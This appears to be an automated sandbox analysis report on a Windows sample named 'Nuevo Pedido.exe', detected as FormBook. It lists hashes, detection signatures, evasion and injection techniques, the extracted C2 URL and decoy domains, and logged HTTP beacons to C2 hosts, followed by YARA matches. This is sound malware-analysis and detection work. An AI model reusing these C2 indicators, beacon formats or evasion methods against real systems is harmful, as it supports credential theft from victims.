Windows Analysis Report: Nuevo Pedido.exe

Overview

General Information

Sample Name: Nuevo Pedido.exe
Analysis ID: 528617
MD5: 159c46c59cd8ecb7a2bce707de1bc370
SHA1: e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256: 7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
Multi AV Scanner detection for submitted file
Source: Nuevo Pedido.exe Virustotal: Detection: 32%
Source: Nuevo Pedido.exe ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Nuevo Pedido.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Nuevo Pedido.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 4x nop then pop edi 3_2_00415660
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 4x nop then pop esi 3_2_004157D8
Source: C:\Users\user\Desktop\Nuevo Pedido.exe Code function: 4x nop then pop esi 3_2_004157AA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop edi 16_2_00615660
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop esi 16_2_006157D8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4x nop then pop esi 16_2_006157AA

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.rcepjobs.com
Source: C:\Windows\explorer.exe Domain query: www.sosibibyslot.website
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.91 80
Source: C:\Windows\explorer.exe Domain query: www.tremblock.com
Source: C:\Windows\explorer.exe Domain query: www.securebankofamericalog.site
Source: C:\Windows\explorer.exe Domain query: www.thejohnmatt.com
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe Domain query: www.onlinedatingthaiweb.com
Source: C:\Windows\explorer.exe Network Connect: 192.232.250.147 80
Source: C:\Windows\explorer.exe Network Connect: 185.53.178.53 80
Source: C:\Windows\explorer.exe Domain query: www.downingmunroe.online
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.spoiledzone.com/udeh/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TEAMINTERNET-ASDE
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.tremblock.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.rcepjobs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.downingmunroe.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.thejohnmatt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.onlinedatingthaiweb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.64.163.50
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 25 Nov 2021 14:10:30 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 25 Nov 2021 14:11:10 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp String found in binary or memory: http://www.rcepjobs.com
Source: unknown DNS traffic detected: queries for: www.tremblock.com
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.tremblock.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.rcepjobs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.downingmunroe.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.thejohnmatt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.onlinedatingthaiweb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: Nuevo Pedido.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
